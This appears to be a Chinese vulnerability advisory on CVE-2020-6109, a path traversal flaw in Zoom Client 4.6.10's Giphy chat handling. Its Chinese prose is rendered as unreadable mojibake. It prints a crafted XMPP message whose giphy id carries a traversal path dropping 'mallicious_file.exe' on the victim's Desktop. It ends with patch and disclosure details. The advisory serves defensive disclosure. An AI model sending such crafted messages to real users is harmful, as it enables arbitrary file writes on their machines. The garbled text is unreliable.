CVE-2020-6109 | ZOOM¿Í»§¶Ëõè¾¶±éÀú·ì϶¹«¸æ
°ä²¼¹¦·ò 2020-06-050x00 ·ì϶¸ÅÊö
|
CVE ID |
CVE-2020-6109 |
ʱ ¼ä |
2020-06-04 |
|
Àà ÐÍ |
DT |
µÈ ¼¶ |
¸ßΣ |
|
Ô¶³ÌÀûÓà |
ÊÇ |
Ó°ÏìÁìÓò |
Zoom Client 4.6.10 |
0x01 ·ì϶ÏêÇé
Zoom ClientÊÇÃÀ¹úZoom¹«Ë¾µÄÒ»¿îÖ§³Ö¶àÖÔì½Ì¨µÄÊÓÆµ»áÒé¿Í»§¶ËÀûÓ÷¨Ê½¡£¡£¡£¡£¡£¡£¡£
CVE-2020-6109ÔÚZoom Client°æ±¾4.6.10ÖдæÔÚ¿ÉÀûÓõÄõè¾¶±éÀú·ì϶£¬£¬£¬£¬£¬£¬¸Ã·ì϶ÔÚ´¦ÖÃÔ̺¬¶¯»GIFµÄÐÂÎÅʱ¡£¡£¡£¡£¡£¡£¡£ÌØÔìµÄ̸ÌìÐÂÎÅ¿ÉÄܵ¼ÖÂËÁÒâÎļþдÈ룬£¬£¬£¬£¬£¬¿ÉÄÜ»á½øÒ»²½ÀÄÓøÃÎļþÒÔʵÏÖËÁÒâ´úÂëÖ´ÐÓ×£¡£¡£¡£¡£¡£¡£¹¥»÷Õß±ØÒªÏòÖ¸±êÓû§»ò×é·¢ËÍÌØÔìÐÂÎÅÄÜÁ¦´¥·¢´Ë·ì϶¡£¡£¡£¡£¡£¡£¡£
ZoomµÄ̸ÌìÖ°ÄܳÉÁ¢ÔÚXMPP³ß¶ÈµÄ»ù´¡ÉÏ£¬£¬£¬£¬£¬£¬²¢ÓµÓÐÖ§³ÔìäËûÀ©´óÖ°ÄÜ¡£¡£¡£¡£¡£¡£¡£ÕâЩÀ©´óÖ®Ò»Ö§³ÖÔÚ̸ÌìÖÐÔ̺¬¶¯»GIFÐÂÎŵÄÖ°ÄÜ¡£¡£¡£¡£¡£¡£¡£Ìṩ´ËÖ°Äܲ¢ÒÀÀµGiphy·þÎñ¡£¡£¡£¡£¡£¡£¡£µ±¿Í»§¶ËÊÕµ½´øÓдËgiphyÀ©´óÃûµÄXMPPÐÂÎÅʱ£¬£¬£¬£¬£¬£¬½«ÅúʾÆä½Ó¼ûÖ¸¶¨µÄHTTP URL²¢»ñÈ¡GIFÎļþ·¢Ë͸øÓû§¡£¡£¡£¡£¡£¡£¡£´ËÀàXMPPÐÂÎŵÄʾÀýÈçÏ£º
<message from='source@xmpp.zoom.us' to='destination@xmpp.zoom.us' id='random' type='chat'>
<body>User Name sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
<thread>RANDOM</thread>
<active xmlns='http://jabber.org/protocol/chatstates'/>
<sns>
<format>%1$@ sent you a picture</format>
<args>
<arg>User Name</arg>
</args>
</sns>
<giphy id='filename' url='image_url' tags='congrats'>
<pcInfo url='image_url_for_pc_display' size='10'/>
<mobileInfo url='image_url_for_mobile_display' size='10'/>
<bigPicInfo url='image_url_for_full_size_display' size='10'/>
</giphy>
<zmext expire_t='timestamp' prev='timestamp' t='timestamp'>
<from n='User Name' e='email' res='ZoomChat_pc'/>
<to/>
<visible>true</visible>
<msg_feature>0</msg_feature>
</zmext>
</message>
ÉÏÃæµÄXML´úÂëÖÐÓÐÁ½¸öÖµ±ØÒª¹Ø×¢¡£¡£¡£¡£¡£¡£¡£Ê×ÏÈ£¬£¬£¬£¬£¬£¬¸Ãgiphy±êÇ©Ô̺¬Èý¸öÖ¸±êURL£¬£¬£¬£¬£¬£¬ÕâЩURLÓ¦¸ÃÖ¸ÏòGiphyµÄ·þÎñÆ÷¡£¡£¡£¡£¡£¡£¡£¼ò¶ÌµÄ²âÊÔÅú×¢£¬£¬£¬£¬£¬£¬Ã»ÓÐÖ´ÐÐÖ¸±êURLµÄÑéÖ¤£¬£¬£¬£¬£¬£¬²¢ÇÒ¿Í»§¶Ë½«×ñÑÖ¸¶¨µÄURL£¬£¬£¬£¬£¬£¬Ô̺¬ËÁÒâ·þÎñÆ÷¡£¡£¡£¡£¡£¡£¡£Ö¸¶¨×Ô½ç˵URLʱ£¬£¬£¬£¬£¬£¬Äܹ»¹Û²ìµ½À´×Ô¿Í»§¶ËµÄHTTPÏνӣº
GET /test.gif HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (ZOOM.Mac 10.14.6 x86)
Accept: */*
Cookie: srid=SaaSbeeTestMode00123578;
ZM-CAP: 2535978022733895607,164
ZM-PROP: Mac.Zoom
ZM-NSGN:2,zVM1hmoFnK2kx8t/KEifN7IAXRSE/CnqolsM0zV6ess=,1586812854000
Ó¦¸ÃÖ¸³öµÄÊÇ£¬£¬£¬£¬£¬£¬Ö»¹ÜÒÔÉÏÒªÇóÖÐûÓÐÑéÖ¤cookie£¬£¬£¬£¬£¬£¬µ«ÈÔÓÐ×ã¹»µÄÐÅϢй¶Ψһ±êʶµÄ¿Í»§¶Ë¡£¡£¡£¡£¡£¡£¡£±êÍ·ZM-NSGNÔ̺¬¾¹ý¹þÏ£´¦ÖúͱàÂëµÄΨһ¿Í»§¶ËÉ豸ID¡£¡£¡£¡£¡£¡£¡£
²âÊÔ·¢ÏÖ¼´±ãgiphyÀ©´óÃû½öÏÔʾGIFͼÏñ£¬£¬£¬£¬£¬£¬ËüÒ²½«ÇáËÉÏÔʾºÍÔ¤ÀÀÆäËûͼÏñÀàÐÍ¡£¡£¡£¡£¡£¡£¡£ÕâÔ̺¬PNGºÍJPEGÎļþÌåʽ¡£¡£¡£¡£¡£¡£¡£
´ËÐÂÎÅXML´úÂëÖеĵڶþ¼þÓÐȤµÄÊÂÊÇ£¬£¬£¬£¬£¬£¬ÏóÕ÷µÄidÊôÐÔgiphyÖ±½ÓÓë¿Í»§¶Ë»º´æÔÚ´ÅÅÌÉϵÄͼÏñÎļþÃûÓйØÁª¡£¡£¡£¡£¡£¡£¡£»£»£»£»£»£»£»»¾ä»°Ëµ£¬£¬£¬£¬£¬£¬¿Í»§¶ËÀûÓ÷¨Ê½½«Ê¹ÓôËÖ¸¶¨µÄID½«Îļþ±£Áôµ½´ÅÅÌÒÔ¹©½«À´ÏÔʾ¡£¡£¡£¡£¡£¡£¡£¿£¿£¿£¿£Äܹ»ÌṩËÁÒâÎļþÃû£¬£¬£¬£¬£¬£¬²¢ÇÒÎļþ½«´æ´¢ÔÚdataZoom×°ÖÃĿ¼ÏÂĿ¼ÖеĿÉÔ¤²âµØÎ»¡£¡£¡£¡£¡£¡£¡£
ÕæÕýµÄ·ì϶ÔÚÓÚÕâÑùµÄÇé¿ö£¬£¬£¬£¬£¬£¬¼´ÎļþÃûûÓÐÒÔÈκη½Ê½É¾³ý£¬£¬£¬£¬£¬£¬²¢ÔÊÐíĿ¼±éÀú¡£¡£¡£¡£¡£¡£¡£ÕâÒâζ×ÅÏóÕ÷µÄÌØÔìidÊôÐÔgiphyÄܹ»Ô̺¬Ò»¸öÌØÊâÎļþõè¾¶£¬£¬£¬£¬£¬£¬¸Ãõè¾¶½«ÔÚZoomµÄ×°ÖÃĿ¼֮±í²¢ÇÒÏÖʵÉÏÔÚµ±Ç°Óû§¿ÉдµÄÈκÎĿ¼ÖÐдÈëÎļþ¡£¡£¡£¡£¡£¡£¡£ÒÔÏÂÅú¸ÄµÄmessage˵ÁËÈ»ÕâÖÖ¿ÉÄÜÐÔ£º
<message from='source@xmpp.zoom.us' to='destination@xmpp.zoom.us' id='random' type='chat'>
<body>User Name sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
<thread>RANDOM</thread>
<active xmlns='http://jabber.org/protocol/chatstates'/>
<sns>
<format>%1$@ sent you a picture</format>
<args>
<arg>User Name</arg>
</args>
</sns>
<giphy id='../../../../../../Desktop/mallicious_file.exe' url='image_url' tags='congrats'>
<pcInfo url='image_url_for_pc_display' size='10'/>
<mobileInfo url='image_url_for_mobile_display' size='10'/>
<bigPicInfo url='image_url_for_full_size_display' size='10'/>
</giphy>
<zmext expire_t='timestamp' prev='timestamp' t='timestamp'>
<from n='User Name' e='email' res='ZoomChat_pc'/>
<to/>
<visible>true</visible>
<msg_feature>0</msg_feature>
</zmext>
</message>
Zoom¿Í»§¶Ë»á½«×Ö·û´®¸½¼Ó_BigPic.gifµ½Ö¸¶¨µÄÎļþÃûÕâÒ»ÊÂʵÄܹ»²¿ÃÅ»º½â´Ë·ì϶¡£¡£¡£¡£¡£¡£¡£ÕâÑùÄܹ»Ô¤·À¹¥»÷Õß´´½¨ÓµÓÐËÁÒâÀ©´óÃûµÄ¿ÉÆëÈ«½ÚÔìµÄÎļþ¡£¡£¡£¡£¡£¡£¡£ÈôÊǹ¥»÷ÕßÑ¡ÔñÁË.gifÀ©´óÃû£¬£¬£¬£¬£¬£¬ÒÔÉÏÄÚÈÝÈÔ½«Ê¹ÓÃÎļþÃû½«ËÁÒâÄÚÈݵÄÎļþ¸éÖõ½µ±Ç°Óû§µÄ×ÀÃæÉÏ¡£¡£¡£¡£¡£¡£¡£ÎļþµÄÄÚÈݲ»½öÏÞÓÚͼÏñ£¬£¬£¬£¬£¬£¬»¹¿ÉÄÜÔ̺¬¿ÉÖ´ÐдúÂë»ò¾ç±¾£¬£¬£¬£¬£¬£¬ÕâЩ´úÂë»ò¾ç±¾¿ÉÄܱ»ÀÄÓÃÒÔÔ®ÊÖÀûÓÃÁíÒ»¸ö·ì϶¡£¡£¡£¡£¡£¡£¡£
´Ë±í¿ÉÄÜ»áÔÚWindowsϵͳÉÏ´´½¨¿ÕÎļþµÄËÁÒâÀ©´óÃû¡£¡£¡£¡£¡£¡£¡£
0x02 ´ëÖý¨Òé
Ŀǰ³§ÉÌÒѰ䲼4.6.12°æ±¾ÒÔ½¨¸´·ì϶£¬£¬£¬£¬£¬£¬ÏÂÔØµØÖ·£º
https://zoom.us/
0x03 ÓйØÐÂÎÅ
https://securityaffairs.co/wordpress/104249/hacking/zoom-security-flaws.html
0x04 ²Î¿¼Á´½Ó
https://talosintelligence.com/vulnerability_reports/TALOS-2020-1055
0x05 ¹¦·òÏß
2020-04-16 ×êÑÐÈËÔ±Åû¶
2020-06-04 VSRC°ä²¼·ì϶¹«¸æ


¾©¹«Íø°²±¸11010802024551ºÅ